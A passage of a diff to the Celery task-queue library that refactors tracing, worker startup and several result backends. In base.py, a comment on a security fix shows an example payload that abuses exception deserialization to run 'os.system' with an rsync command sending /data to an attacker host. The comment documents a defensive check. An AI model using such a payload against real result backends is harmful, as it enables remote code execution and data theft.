+ r = AsyncResult(task_request.id, app=app)
+
+ try:
+ state = r.state
+ except BackendGetMetaError:
+ pass
+ else:
+ if state == SUCCESS:
+ info(LOG_IGNORED, {
+ 'id': task_request.id,
+ 'name': get_task_name(task_request, name),
+ 'description': 'Task already completed successfully.'
+ })
+ return trace_ok_t(R, I, T, Rstr)
+
+ push_task(task)
root_id = task_request.root_id or uuid
task_priority = task_request.delivery_info.get('priority') if \
inherit_parent_priority else None
@@ -399,13 +438,16 @@ def trace_task(uuid, args, kwargs, request=None):
args=args, kwargs=kwargs)
loader_task_init(uuid, task)
if track_started:
- store_result(
+ task.backend.store_result(
uuid, {'pid': pid, 'hostname': hostname}, STARTED,
request=task_request,
)
# -*- TRACE -*-
try:
+ if task_before_start:
+ task_before_start(uuid, args, kwargs)
+
R = retval = fun(*args, **kwargs)
state = SUCCESS
except Reject as exc:
@@ -473,7 +515,7 @@ def trace_task(uuid, args, kwargs, request=None):
parent_id=uuid, root_id=root_id,
priority=task_priority
)
- mark_as_done(
+ task.backend.mark_as_done(
uuid, retval, task_request, publish_result,
)
except EncodeError as exc:
@@ -491,6 +533,8 @@ def trace_task(uuid, args, kwargs, request=None):
'name': get_task_name(task_request, name),
'return_value': Rstr,
'runtime': T,
+ 'args': safe_repr(args),
+ 'kwargs': safe_repr(kwargs),
})
# -* POST *-
@@ -510,7 +554,7 @@ def trace_task(uuid, args, kwargs, request=None):
pop_request()
if not eager:
try:
- backend_cleanup()
+ task.backend.process_cleanup()
loader_cleanup()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
@@ -564,9 +608,9 @@ def _signal_internal_error(task, uuid, args, kwargs, request, exc):
del tb
-def _trace_task_ret(name, uuid, request, body, content_type,
- content_encoding, loads=loads_message, app=None,
- **extra_request):
+def trace_task_ret(name, uuid, request, body, content_type,
+ content_encoding, loads=loads_message, app=None,
+ **extra_request):
app = app or current_app._get_current_object()
embed = None
if content_type:
@@ -586,12 +630,9 @@ def _trace_task_ret(name, uuid, request, body, content_type,
return (1, R, T) if I else (0, Rstr, T)
-trace_task_ret = _trace_task_ret # noqa: E305
-
-
-def _fast_trace_task(task, uuid, request, body, content_type,
- content_encoding, loads=loads_message, _loc=None,
- hostname=None, **_):
+def fast_trace_task(task, uuid, request, body, content_type,
+ content_encoding, loads=loads_message, _loc=None,
+ hostname=None, **_):
_loc = _localized if not _loc else _loc
embed = None
tasks, accept, hostname = _loc
@@ -626,8 +667,6 @@ def report_internal_error(task, exc):
def setup_worker_optimizations(app, hostname=None):
"""Setup worker related optimizations."""
- global trace_task_ret
-
hostname = hostname or gethostname()
# make sure custom Task.__call__ methods that calls super
@@ -653,16 +692,11 @@ def setup_worker_optimizations(app, hostname=None):
hostname,
]
- trace_task_ret = _fast_trace_task
- from celery.worker import request as request_module
- request_module.trace_task_ret = _fast_trace_task
- request_module.__optimize__()
+ app.use_fast_trace_task = True
-def reset_worker_optimizations():
+def reset_worker_optimizations(app=current_app):
"""Reset previously configured optimizations."""
- global trace_task_ret
- trace_task_ret = _trace_task_ret
try:
delattr(BaseTask, '_stackprotected')
except AttributeError:
@@ -671,8 +705,7 @@ def reset_worker_optimizations():
BaseTask.__call__ = _patched.pop('BaseTask.__call__')
except KeyError:
pass
- from celery.worker import request as request_module
- request_module.trace_task_ret = _trace_task_ret
+ app.use_fast_trace_task = False
def _install_stack_protection():
diff --git a/celery/app/utils.py b/celery/app/utils.py
index 05aeb1e5016..8b72652e708 100644
--- a/celery/app/utils.py
+++ b/celery/app/utils.py
@@ -394,7 +394,8 @@ def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd):
try:
found = sym.celery
if isinstance(found, ModuleType):
- raise AttributeError("attribute 'celery' is the celery module not the instance of celery")
+ raise AttributeError(
+ "attribute 'celery' is the celery module not the instance of celery")
except AttributeError:
if getattr(sym, '__path__', None):
try:
diff --git a/celery/apps/beat.py b/celery/apps/beat.py
index 41437718e9c..8652c62730a 100644
--- a/celery/apps/beat.py
+++ b/celery/apps/beat.py
@@ -111,7 +111,7 @@ def start_scheduler(self):
def banner(self, service):
c = self.colored
- return str( # flake8: noqa
+ return str(
c.blue('__ ', c.magenta('-'),
c.blue(' ... __ '), c.magenta('-'),
c.blue(' _\n'),
diff --git a/celery/apps/multi.py b/celery/apps/multi.py
index b82eee4c9b3..613743426e5 100644
--- a/celery/apps/multi.py
+++ b/celery/apps/multi.py
@@ -78,7 +78,7 @@ def __init__(self, args):
self.namespaces = defaultdict(lambda: OrderedDict())
def parse(self):
- rargs = list(self.args)
+ rargs = [arg for arg in self.args if arg]
pos = 0
while pos < len(rargs):
arg = rargs[pos]
@@ -150,7 +150,7 @@ def _setdefaultopt(self, d, alt, value):
pass
value = d.setdefault(alt[0], os.path.normpath(value))
dir_path = os.path.dirname(value)
- if not os.path.exists(dir_path):
+ if dir_path and not os.path.exists(dir_path):
os.makedirs(dir_path)
return value
@@ -160,10 +160,30 @@ def _prepare_expander(self):
self.name, shortname, hostname)
def _prepare_argv(self):
+ cmd = self.expander(self.cmd).split(' ')
+ i = cmd.index('celery') + 1
+
+ options = self.options.copy()
+ for opt, value in self.options.items():
+ if opt in (
+ '-A', '--app',
+ '-b', '--broker',
+ '--result-backend',
+ '--loader',
+ '--config',
+ '--workdir',
+ '-C', '--no-color',
+ '-q', '--quiet',
+ ):
+ cmd.insert(i, format_opt(opt, self.expander(value)))
+
+ options.pop(opt)
+
+ cmd = [' '.join(cmd)]
argv = tuple(
- [self.expander(self.cmd)] +
+ cmd +
[format_opt(opt, self.expander(value))
- for opt, value in self.options.items()] +
+ for opt, value in options.items()] +
[self.extra_args]
)
if self.append:
@@ -222,7 +242,7 @@ def getopt(self, *alt):
raise KeyError(alt[0])
def __repr__(self):
- return '<{name}: {0.name}>'.format(self, name=type(self).__name__)
+ return f'<{type(self).__name__}: {self.name}>'
@cached_property
def pidfile(self):
diff --git a/celery/apps/worker.py b/celery/apps/worker.py
index 6c1b5eb1c20..8f774ae3858 100644
--- a/celery/apps/worker.py
+++ b/celery/apps/worker.py
@@ -79,7 +79,7 @@ def active_thread_count():
def safe_say(msg):
- print(f'\n{msg}', file=sys.__stderr__)
+ print(f'\n{msg}', file=sys.__stderr__, flush=True)
class Worker(WorkController):
@@ -121,7 +121,7 @@ def on_init_blueprint(self):
def on_start(self):
app = self.app
- WorkController.on_start(self)
+ super().on_start()
# this signal can be used to, for example, change queues after
# the -Q option has been applied.
@@ -141,12 +141,23 @@ def on_start(self):
app.log.redirect_stdouts(self.redirect_stdouts_level)
# TODO: Remove the following code in Celery 6.0
- if app.conf.maybe_warn_deprecated_settings():
- logger.warning(
- "Please run `celery upgrade settings path/to/settings.py` "
- "to avoid these warnings and to allow a smoother upgrade "
- "to Celery 6.0."
- )
+ # This qualifies as a hack for issue #6366.
+ warn_deprecated = True
+ config_source = app._config_source
+ if isinstance(config_source, str):
+ # Don't raise the warning when the settings originate from
+ # django.conf:settings
+ warn_deprecated = config_source.lower() not in [
+ 'django.conf:settings',
+ ]
+
+ if warn_deprecated:
+ if app.conf.maybe_warn_deprecated_settings():
+ logger.warning(
+ "Please run `celery upgrade settings path/to/settings.py` "
+ "to avoid these warnings and to allow a smoother upgrade "
+ "to Celery 6.0."
+ )
def emit_banner(self):
# Dump configuration to screen so we have some basic information
@@ -158,7 +169,7 @@ def emit_banner(self):
str(self.colored.cyan(
' \n', self.startup_info(artlines=not use_image))),
str(self.colored.reset(self.extra_info() or '')),
- ])), file=sys.__stdout__)
+ ])), file=sys.__stdout__, flush=True)
def on_consumer_ready(self, consumer):
signals.worker_ready.send(sender=consumer)
@@ -176,7 +187,7 @@ def purge_messages(self):
with self.app.connection_for_write() as connection:
count = self.app.control.purge(connection=connection)
if count: # pragma: no cover
- print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n")
+ print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True)
def tasklist(self, include_builtins=True, sep='\n', int_='celery.'):
return sep.join(
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 8297398a6c2..a7575741575 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -17,7 +17,7 @@
from pyArango import connection as py_arango_connection
from pyArango.theExceptions import AQLQueryError
except ImportError:
- py_arango_connection = AQLQueryError = None # noqa
+ py_arango_connection = AQLQueryError = None
__all__ = ('ArangoDbBackend',)
@@ -48,6 +48,7 @@ class ArangoDbBackend(KeyValueStoreBackend):
password = None
# protocol is not supported in backend url (http is taken as default)
http_protocol = 'http'
+ verify = False
# Use str as arangodb key not bytes
key_t = str
@@ -88,6 +89,7 @@ def __init__(self, url=None, *args, **kwargs):
self.host = host or config.get('host', self.host)
self.port = int(port or config.get('port', self.port))
self.http_protocol = config.get('http_protocol', self.http_protocol)
+ self.verify = config.get('verify', self.verify)
self.database = database or config.get('database', self.database)
self.collection = \
collection or config.get('collection', self.collection)
@@ -104,7 +106,7 @@ def connection(self):
if self._connection is None:
self._connection = py_arango_connection.Connection(
arangoURL=self.arangodb_url, username=self.username,
- password=self.password
+ password=self.password, verify=self.verify
)
return self._connection
diff --git a/celery/backends/asynchronous.py b/celery/backends/asynchronous.py
index 32475d5eaa6..cedae5013a8 100644
--- a/celery/backends/asynchronous.py
+++ b/celery/backends/asynchronous.py
@@ -66,18 +66,30 @@ def wait_for(self, p, wait, timeout=None):
class greenletDrainer(Drainer):
spawn = None
_g = None
+ _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration
+
+ def _create_drain_complete_event(self):
+ """create new self._drain_complete_event object"""
+ pass
+
+ def _send_drain_complete_event(self):
+ """raise self._drain_complete_event for wakeup .wait_for"""
+ pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._started = threading.Event()
self._stopped = threading.Event()
self._shutdown = threading.Event()
+ self._create_drain_complete_event()
def run(self):
self._started.set()
while not self._stopped.is_set():
try:
self.result_consumer.drain_events(timeout=1)
+ self._send_drain_complete_event()
+ self._create_drain_complete_event()
except socket.timeout:
pass
self._shutdown.set()
@@ -89,8 +101,14 @@ def start(self):
def stop(self):
self._stopped.set()
+ self._send_drain_complete_event()
self._shutdown.wait(THREAD_TIMEOUT_MAX)
+ def wait_for(self, p, wait, timeout=None):
+ self.start()
+ if not p.ready:
+ self._drain_complete_event.wait(timeout=timeout)
+
@register_drainer('eventlet')
class eventletDrainer(greenletDrainer):
@@ -101,10 +119,12 @@ def spawn(self, func):
sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- self.start()
- if not p.ready:
- self._g._exit_event.wait(timeout=timeout)
+ def _create_drain_complete_event(self):
+ from eventlet.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.send()
@register_drainer('gevent')
@@ -116,11 +136,13 @@ def spawn(self, func):
gevent.sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- import gevent
- self.start()
- if not p.ready:
- gevent.wait([self._g], timeout=timeout)
+ def _create_drain_complete_event(self):
+ from gevent.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.set()
+ self._create_drain_complete_event()
class AsyncBackendMixin:
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index f287200dcc7..e7d2c231808 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -8,17 +8,17 @@
from .base import KeyValueStoreBackend
try:
- from azure import storage as azurestorage
- from azure.common import AzureMissingResourceHttpError
- from azure.storage.blob import BlockBlobService
- from azure.storage.common.retry import ExponentialRetry
-except ImportError: # pragma: no cover
- azurestorage = BlockBlobService = ExponentialRetry = \
- AzureMissingResourceHttpError = None # noqa
+ import azure.storage.blob as azurestorage
+ from azure.core.exceptions import (ResourceExistsError,
+ ResourceNotFoundError)
+ from azure.storage.blob import BlobServiceClient
+except ImportError:
+ azurestorage = None
__all__ = ("AzureBlockBlobBackend",)
LOGGER = get_logger(__name__)
+AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://'
class AzureBlockBlobBackend(KeyValueStoreBackend):
@@ -27,17 +27,14 @@ class AzureBlockBlobBackend(KeyValueStoreBackend):
def __init__(self,
url=None,
container_name=None,
- retry_initial_backoff_sec=None,
- retry_increment_base=None,
- retry_max_attempts=None,
*args,
**kwargs):
super().__init__(*args, **kwargs)
- if azurestorage is None:
+ if azurestorage is None or azurestorage.__version__ < '12':
raise ImproperlyConfigured(
- "You need to install the azure-storage library to use the "
- "AzureBlockBlob backend")
+ "You need to install the azure-storage-blob v12 library to"
+ "use the AzureBlockBlob backend")
conf = self.app.conf
@@ -47,20 +44,14 @@ def __init__(self,
container_name or
conf["azureblockblob_container_name"])
- self._retry_initial_backoff_sec = (
- retry_initial_backoff_sec or
- conf["azureblockblob_retry_initial_backoff_sec"])
-
- self._retry_increment_base = (
- retry_increment_base or
- conf["azureblockblob_retry_increment_base"])
-
- self._retry_max_attempts = (
- retry_max_attempts or
- conf["azureblockblob_retry_max_attempts"])
+ self.base_path = conf.get('azureblockblob_base_path', '')
+ self._connection_timeout = conf.get(
+ 'azureblockblob_connection_timeout', 20
+ )
+ self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
- def _parse_url(cls, url, prefix="azureblockblob://"):
+ def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX):
connection_string = url[len(prefix):]
if not connection_string:
raise ImproperlyConfigured("Invalid URL")
@@ -68,26 +59,26 @@ def _parse_url(cls, url, prefix="azureblockblob://"):
return connection_string
@cached_property
- def _client(self):
- """Return the Azure Storage Block Blob service.
+ def _blob_service_client(self):
+ """Return the Azure Storage Blob service client.
If this is the first call to the property, the client is created and
the container is created if it doesn't yet exist.
"""
- client = BlockBlobService(connection_string=self._connection_string)
-
- created = client.create_container(
- container_name=self._container_name, fail_on_exist=False)
+ client = BlobServiceClient.from_connection_string(
+ self._connection_string,
+ connection_timeout=self._connection_timeout,
+ read_timeout=self._read_timeout
+ )
- if created:
- LOGGER.info("Created Azure Blob Storage container %s",
- self._container_name)
-
- client.retry = ExponentialRetry(
- initial_backoff=self._retry_initial_backoff_sec,
- increment_base=self._retry_increment_base,
- max_attempts=self._retry_max_attempts).retry
+ try:
+ client.create_container(name=self._container_name)
+ msg = f"Container created with name {self._container_name}."
+ except ResourceExistsError:
+ msg = f"Container with name {self._container_name} already." \
+ "exists. This will not be created."
+ LOGGER.info(msg)
return client
@@ -96,16 +87,18 @@ def get(self, key):
Args:
key: The key for which to read the value.
-
"""
key = bytes_to_str(key)
- LOGGER.debug("Getting Azure Block Blob %s/%s",
- self._container_name, key)
+ LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key)
+
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
try:
- return self._client.get_blob_to_text(
- self._container_name, key).content
- except AzureMissingResourceHttpError:
+ return blob_client.download_blob().readall().decode()
+ except ResourceNotFoundError:
return None
def set(self, key, value):
@@ -117,11 +110,14 @@ def set(self, key, value):
"""
key = bytes_to_str(key)
- LOGGER.debug("Creating Azure Block Blob at %s/%s",
- self._container_name, key)
+ LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}")
- return self._client.create_blob_from_text(
- self._container_name, key, value)
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
+
+ blob_client.upload_blob(value, overwrite=True)
def mget(self, keys):
"""Read all the values for the provided keys.
@@ -140,7 +136,31 @@ def delete(self, key):
"""
key = bytes_to_str(key)
- LOGGER.debug("Deleting Azure Block Blob at %s/%s",
- self._container_name, key)
-
- self._client.delete_blob(self._container_name, key)
+ LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}")
+
+ blob_client = self._blob_service_client.get_blob_client(
+ container=self._container_name,
+ blob=f'{self.base_path}{key}',
+ )
+
+ blob_client.delete_blob()
+
+ def as_uri(self, include_password=False):
+ if include_password:
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{self._connection_string}'
+ )
+
+ connection_string_parts = self._connection_string.split(';')
+ account_key_prefix = 'AccountKey='
+ redacted_connection_string_parts = [
+ f'{account_key_prefix}**' if part.startswith(account_key_prefix)
+ else part
+ for part in connection_string_parts
+ ]
+
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{";".join(redacted_connection_string_parts)}'
+ )
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 28e5b2a4d6b..094cbf86921 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -22,9 +22,11 @@
import celery.exceptions
from celery import current_app, group, maybe_signature, states
from celery._state import get_current_task
+from celery.app.task import Context
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
ChordError, ImproperlyConfigured,
- NotRegistered, TaskRevokedError, TimeoutError)
+ NotRegistered, SecurityError, TaskRevokedError,
+ TimeoutError)
from celery.result import (GroupResult, ResultBase, ResultSet,
allow_join_result, result_from_tuple)
from celery.utils.collections import BufferMap
@@ -76,6 +78,12 @@ def ignore(self, *a, **kw):
__setitem__ = update = setdefault = ignore
+def _is_request_ignore_result(request):
+ if request is None:
+ return False
+ return request.ignore_result
+
+
class Backend:
READY_STATES = states.READY_STATES
UNREADY_STATES = states.UNREADY_STATES
@@ -122,7 +130,7 @@ def __init__(self, app,
# precedence: accept, conf.result_accept_content, conf.accept_content
self.accept = conf.result_accept_content if accept is None else accept
- self.accept = conf.accept_content if self.accept is None else self.accept # noqa: E501
+ self.accept = conf.accept_content if self.accept is None else self.accept
self.accept = prepare_accept_content(self.accept)
self.always_retry = conf.get('result_backend_always_retry', False)
@@ -150,7 +158,7 @@ def mark_as_started(self, task_id, **meta):
def mark_as_done(self, task_id, result,
request=None, store_result=True, state=states.SUCCESS):
"""Mark task as successfully executed."""
- if store_result:
+ if (store_result and not _is_request_ignore_result(request)):
self.store_result(task_id, result, state, request=request)
if request and request.chord:
self.on_chord_part_return(request, state, result)
@@ -164,8 +172,50 @@ def mark_as_failure(self, task_id, exc,
self.store_result(task_id, exc, state,
traceback=traceback, request=request)
if request:
+ # This task may be part of a chord
if request.chord:
self.on_chord_part_return(request, state, exc)
+ # It might also have chained tasks which need to be propagated to,
+ # this is most likely to be exclusive with being a direct part of a
+ # chord but we'll handle both cases separately.
+ #
+ # The `chain_data` try block here is a bit tortured since we might
+ # have non-iterable objects here in tests and it's easier this way.
+ try:
+ chain_data = iter(request.chain)
+ except (AttributeError, TypeError):
+ chain_data = tuple()
+ for chain_elem in chain_data:
+ # Reconstruct a `Context` object for the chained task which has
+ # enough information to for backends to work with
+ chain_elem_ctx = Context(chain_elem)
+ chain_elem_ctx.update(chain_elem_ctx.options)
+ chain_elem_ctx.id = chain_elem_ctx.options.get('task_id')
+ chain_elem_ctx.group = chain_elem_ctx.options.get('group_id')
+ # If the state should be propagated, we'll do so for all
+ # elements of the chain. This is only truly important so
+ # that the last chain element which controls completion of
+ # the chain itself is marked as completed to avoid stalls.
+ #
+ # Some chained elements may be complex signatures and have no
+ # task ID of their own, so we skip them hoping that not
+ # descending through them is OK. If the last chain element is
+ # complex, we assume it must have been uplifted to a chord by
+ # the canvas code and therefore the condition below will ensure
+ # that we mark something as being complete as avoid stalling.
+ if (
+ store_result and state in states.PROPAGATE_STATES and
+ chain_elem_ctx.task_id is not None
+ ):
+ self.store_result(
+ chain_elem_ctx.task_id, exc, state,
+ traceback=traceback, request=chain_elem_ctx,
+ )
+ # If the chain element is a member of a chord, we also need
+ # to call `on_chord_part_return()` as well to avoid stalls.
+ if 'chord' in chain_elem_ctx.options:
+ self.on_chord_part_return(chain_elem_ctx, state, exc)
+ # And finally we'll fire any errbacks
if call_errbacks and request.errbacks:
self._call_task_errbacks(request, exc, traceback)
@@ -235,19 +285,24 @@ def mark_as_retry(self, task_id, exc, traceback=None,
traceback=traceback, request=request)
def chord_error_from_stack(self, callback, exc=None):
- # need below import for test for some crazy reason
- from celery import group # pylint: disable
app = self.app
try:
backend = app._tasks[callback.task].backend
except KeyError:
backend = self
+ # We have to make a fake request since either the callback failed or
+ # we're pretending it did since we don't have information about the
+ # chord part(s) which failed. This request is constructed as a best
+ # effort for new style errbacks and may be slightly misleading about
+ # what really went wrong, but at least we call them!
+ fake_request = Context({
+ "id": callback.options.get("task_id"),
+ "errbacks": callback.options.get("link_error", []),
+ "delivery_info": dict(),
+ **callback
+ })
try:
- group(
- [app.signature(errback)
- for errback in callback.options.get('link_error') or []],
- app=app,
- ).apply_async((callback.id,))
+ self._call_task_errbacks(fake_request, exc, None)
except Exception as eb_exc: # pylint: disable=broad-except
return backend.fail_from_current_stack(callback.id, exc=eb_exc)
else:
@@ -261,18 +316,14 @@ def fail_from_current_stack(self, task_id, exc=None):
self.mark_as_failure(task_id, exc, exception_info.traceback)
return exception_info
finally:
- if sys.version_info >= (3, 5, 0):
- while tb is not None:
- try:
- tb.tb_frame.clear()
- tb.tb_frame.f_locals
- except RuntimeError:
- # Ignore the exception raised if the frame is still executing.
- pass
- tb = tb.tb_next
-
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear()
+ while tb is not None:
+ try:
+ tb.tb_frame.clear()
+ tb.tb_frame.f_locals
+ except RuntimeError:
+ # Ignore the exception raised if the frame is still executing.
+ pass
+ tb = tb.tb_next
del tb
@@ -288,34 +339,73 @@ def prepare_exception(self, exc, serializer=None):
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
- if exc:
- if not isinstance(exc, BaseException):
- exc_module = exc.get('exc_module')
- if exc_module is None:
- cls = create_exception_cls(
- from_utf8(exc['exc_type']), __name__)
- else:
- exc_module = from_utf8(exc_module)
- exc_type = from_utf8(exc['exc_type'])
- try:
- # Load module and find exception class in that
- cls = sys.modules[exc_module]
- # The type can contain qualified name with parent classes
- for name in exc_type.split('.'):
- cls = getattr(cls, name)
- except (KeyError, AttributeError):
- cls = create_exception_cls(exc_type,
- celery.exceptions.__name__)
- exc_msg = exc['exc_message']
- try:
- if isinstance(exc_msg, (tuple, list)):
- exc = cls(*exc_msg)
- else:
- exc = cls(exc_msg)
- except Exception as err: # noqa
- exc = Exception(f'{cls}({exc_msg})')
+ if not exc:
+ return None
+ elif isinstance(exc, BaseException):
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
+ return exc
+ elif not isinstance(exc, dict):
+ try:
+ exc = dict(exc)
+ except TypeError as e:
+ raise TypeError(f"If the stored exception isn't an "
+ f"instance of "
+ f"BaseException, it must be a dictionary.\n"
+ f"Instead got: {exc}") from e
+
+ exc_module = exc.get('exc_module')
+ try:
+ exc_type = exc['exc_type']
+ except KeyError as e:
+ raise ValueError("Exception information must include"
+ "the exception type") from e
+ if exc_module is None:
+ cls = create_exception_cls(
+ exc_type, __name__)
+ else:
+ try:
+ # Load module and find exception class in that
+ cls = sys.modules[exc_module]
+ # The type can contain qualified name with parent classes
+ for name in exc_type.split('.'):
+ cls = getattr(cls, name)
+ except (KeyError, AttributeError):
+ cls = create_exception_cls(exc_type,
+ celery.exceptions.__name__)
+ exc_msg = exc.get('exc_message', '')
+
+ # If the recreated exception type isn't indeed an exception,
+ # this is a security issue. Without the condition below, an attacker
+ # could exploit a stored command vulnerability to execute arbitrary
+ # python code such as:
+ # os.system("rsync /data attacker@192.168.56.100:~/data")
+ # The attacker sets the task's result to a failure in the result
+ # backend with the os as the module, the system function as the
+ # exception type and the payload
+ # rsync /data attacker@192.168.56.100:~/data
+ # as the exception arguments like so:
+ # {
+ # "exc_module": "os",
+ # "exc_type": "system",
+ # "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ # }
+ if not isinstance(cls, type) or not issubclass(cls, BaseException):
+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
+ raise SecurityError(
+ f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
+
+ # XXX: Without verifying `cls` is actually an exception class,
+ # an attacker could execute arbitrary python code.
+ # cls could be anything, even eval().
+ try:
+ if isinstance(exc_msg, (tuple, list)):
+ exc = cls(*exc_msg)
+ else:
+ exc = cls(exc_msg)
+ except Exception as err: # noqa
+ exc = Exception(f'{cls}({exc_msg})')
+
return exc
def prepare_value(self, result):
@@ -576,11 +666,7 @@ def delete_group(self, group_id):
return self._delete_group(group_id)
def cleanup(self):
- """Backend cleanup.
-
- Note:
- This is run by :class:`celery.task.DeleteExpiredTaskMetaTask`.
- """
+ """Backend cleanup."""
def process_cleanup(self):
"""Cleanup actions to do at the end of a task worker process."""
@@ -594,11 +680,25 @@ def add_to_chord(self, chord_id, result):
def on_chord_part_return(self, request, state, result, **kwargs):
pass
+ def set_chord_size(self, group_id, chord_size):
+ pass
+
def fallback_chord_unlock(self, header_result, body, countdown=1,
**kwargs):
kwargs['result'] = [r.as_tuple() for r in header_result]
- queue = body.options.get('queue', getattr(body.type, 'queue', None))
- priority = body.options.get('priority', getattr(body.type, 'priority', 0))
+ try:
+ body_type = getattr(body, 'type', None)
+ except NotRegistered:
+ body_type = None
+
+ queue = body.options.get('queue', getattr(body_type, 'queue', None))
+
+ if queue is None:
+ # fallback to default routing if queue name was not
+ # explicitly passed to body callback
+ queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name
+
+ priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
countdown=countdown,
@@ -609,8 +709,9 @@ def fallback_chord_unlock(self, header_result, body, countdown=1,
def ensure_chords_allowed(self):
pass
- def apply_chord(self, header_result, body, **kwargs):
+ def apply_chord(self, header_result_args, body, **kwargs):
self.ensure_chords_allowed()
+ header_result = self.app.GroupResult(*header_result_args)
self.fallback_chord_unlock(header_result, body, **kwargs)
def current_task_children(self, request=None):
@@ -705,7 +806,7 @@ class BaseBackend(Backend, SyncBackendMixin):
"""Base (synchronous) result backend."""
-BaseDictBackend = BaseBackend # noqa: E305 XXX compat
+BaseDictBackend = BaseBackend # XXX compat
class BaseKeyValueStoreBackend(Backend):
@@ -857,7 +958,11 @@ def _store_result(self, task_id, result, state,
if current_meta['status'] == states.SUCCESS:
return result
- self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state)
+ try:
+ self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state)
+ except BackendStoreError as ex:
+ raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex
+
return result
def _save_group(self, group_id, result):
@@ -887,8 +992,9 @@ def _restore_group(self, group_id):
meta['result'] = result_from_tuple(result, self.app)
return meta
- def _apply_chord_incr(self, header_result, body, **kwargs):
+ def _apply_chord_incr(self, header_result_args, body, **kwargs):
self.ensure_chords_allowed()
+ header_result = self.app.GroupResult(*header_result_args)
header_result.save(backend=self)
def on_chord_part_return(self, request, state, result, **kwargs):
@@ -919,7 +1025,11 @@ def on_chord_part_return(self, request, state, result, **kwargs):
ChordError(f'GroupResult {gid} no longer exists'),
)
val = self.incr(key)
- size = len(deps)
+ # Set the chord size to the value defined in the request, or fall back
+ # to the number of dependencies we can see from the restored result
+ size = request.chord.get("chord_size")
+ if size is None:
+ size = len(deps)
if val > size: # pragma: no cover
logger.warning('Chord counter incremented too many times for %r',
gid)
@@ -928,7 +1038,9 @@ def on_chord_part_return(self, request, state, result, **kwargs):
j = deps.join_native if deps.supports_native_join else deps.join
try:
with allow_join_result():
- ret = j(timeout=3.0, propagate=True)
+ ret = j(
+ timeout=app.conf.result_chord_join_timeout,
+ propagate=True)
except Exception as exc: # pylint: disable=broad-except
try:
culprit = next(deps._failed_join_report())
diff --git a/celery/backends/cache.py b/celery/backends/cache.py
index 01ac1ac3e5f..7d17837ffd7 100644
--- a/celery/backends/cache.py
+++ b/celery/backends/cache.py
@@ -20,6 +20,10 @@
Please use one of the following backends instead: {1}\
"""
+# Global shared in-memory cache for in-memory cache client
+# This is to share cache between threads
+_DUMMY_CLIENT_CACHE = LRUCache(limit=5000)
+
def import_best_memcache():
if _imp[0] is None:
@@ -29,7 +33,7 @@ def import_best_memcache():
is_pylibmc = True
except ImportError:
try:
- import memcache # noqa
+ import memcache
except ImportError:
raise ImproperlyConfigured(REQUIRES_BACKEND)
_imp[0] = (is_pylibmc, memcache, memcache_key_t)
@@ -43,7 +47,7 @@ def get_best_memcache(*args, **kwargs):
Client = _Client = memcache.Client
if not is_pylibmc:
- def Client(*args, **kwargs): # noqa
+ def Client(*args, **kwargs):
kwargs.pop('behaviors', None)
return _Client(*args, **kwargs)
@@ -53,7 +57,7 @@ def Client(*args, **kwargs): # noqa
class DummyClient:
def __init__(self, *args, **kwargs):
- self.cache = LRUCache(limit=5000)
+ self.cache = _DUMMY_CLIENT_CACHE
def get(self, key, *args, **kwargs):
return self.cache.get(key)
@@ -124,11 +128,11 @@ def set(self, key, value):
def delete(self, key):
return self.client.delete(key)
- def _apply_chord_incr(self, header_result, body, **kwargs):
- chord_key = self.get_key_for_chord(header_result.id)
+ def _apply_chord_incr(self, header_result_args, body, **kwargs):
+ chord_key = self.get_key_for_chord(header_result_args[0])
self.client.set(chord_key, 0, time=self.expires)
return super()._apply_chord_incr(
- header_result, body, **kwargs)
+ header_result_args, body, **kwargs)
def incr(self, key):
return self.client.incr(key)
diff --git a/celery/backends/cassandra.py b/celery/backends/cassandra.py
index 72bb33dfe9f..bf4f69c2753 100644
--- a/celery/backends/cassandra.py
+++ b/celery/backends/cassandra.py
@@ -1,5 +1,4 @@
"""Apache Cassandra result store backend using the DataStax driver."""
-import sys
import threading
from celery import states
@@ -14,7 +13,7 @@
import cassandra.cluster
import cassandra.query
